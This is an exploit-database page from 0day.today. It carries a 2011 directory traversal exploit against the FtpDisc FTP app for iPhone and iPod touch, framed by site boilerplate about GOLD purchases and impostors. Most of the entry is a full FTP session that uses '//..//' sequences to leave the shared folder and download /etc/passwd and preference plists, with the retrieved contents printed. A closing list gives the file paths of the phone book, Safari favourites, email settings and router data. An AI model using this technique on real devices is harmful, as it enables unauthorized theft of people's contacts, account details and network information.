0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal # Date: 02/22/2011 # Author: R3d@l3rt, Sp@2K, Sunlight # Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8 # Version: 1.0 # Tested on: iPhone, iPod 3GS with 4.2.1 firmware # There is directory traversal vulnerability in the FtpDisc. # Exploit Testing C:\>ftp ftp> open 192.168.0.70 2121 Connected to 192.168.0.70. 220 Mocha FTP Server User (192.168.0.70:(none)): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230 Guest login ok ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 documents drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 other drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 photos drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 video 226 Transfer completed ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec. ftp> cd //..//..//..//..//..//..// 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls -r-xr-xr-x 1 nobody nobody 0 Aug 3 201012:41 .file dr-xr-xr-x 1 nobody nobody 1428 Feb 8 12:50 Applications dr-xr-xr-x 1 nobody nobody 68 Aug 19 2010 4:10 Developer dr-xr-xr-x 1 nobody nobody 884 Jan 12 12:53 Library dr-xr-xr-x 1 nobody nobody 102 Aug 19 2010 4:18 System dr-xr-xr-x 1 nobody nobody 306 Feb 8 11:48 User dr-xr-xr-x 1 nobody nobody 2074 Jan 13 9:52 bin dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 boot -r-xr-xr-x 1 nobody nobody 638 Jan 25 15:30 control dr-xr-xr-x 1 nobody nobody 68 Aug 3 201012:41 cores 1 nobody nobody 68 1 dev dr-xr-xr-x 1 nobody nobody 918 Jan 26 11:34 etc dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 lib dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 mnt dr-xr-xr-x 1 nobody nobody 136 Oct 23 201015:12 private dr-xr-xr-x 1 nobody nobody 1666 Jan 13 9:52 sbin drwxrwxrwx 1 nobody nobody 272 Feb 22 16:02 tmp dr-xr-xr-x 1 nobody nobody 374 Jan 13 9:52 usr dr-xr-xr-x 1 nobody nobody 1088 Oct 26 2010 1:19 var 226 Transfer completed ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec. ftp> get ../../../../../../etc/passwd 200 PORT command successful. 550 cannot find the file ftp> get /../../../../../../etc/passwd 200 PORT command successful. 150 Opening ASCII mode data connection for /../../../../../../etc/passwd 226 Transfer completed ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec. ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist 200 PORT command successful. 150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist 226 Transfer completed ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec. ftp> quit 221 Goodbye C:\>type passwd # # 4.3BSD-compatable User Database # # Note that this file is not consulted for login. # It only exisits for compatability with 4.3BSD utilities. # # This file is automatically re-written by various system utilities. # Do not edit this file. Changes will be lost. # nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh mobile:*:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false C:\>type com.apple.Maps.plist bplist00? C:\>type com.apple.conference.plist bplist00?_restoredFromBackup\natTypeCache? _DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag C:\> # IPhone inside information 1. Phone Book - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb 2. Safari Favorites List - /private/var/mobile/Library/Safari 3. Users E-mail Information - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist 4. IPv4 Router Information - /private/var/mobile/Library/Preferences/com.apple.conference.plist # 0day.today [2024-12-24] #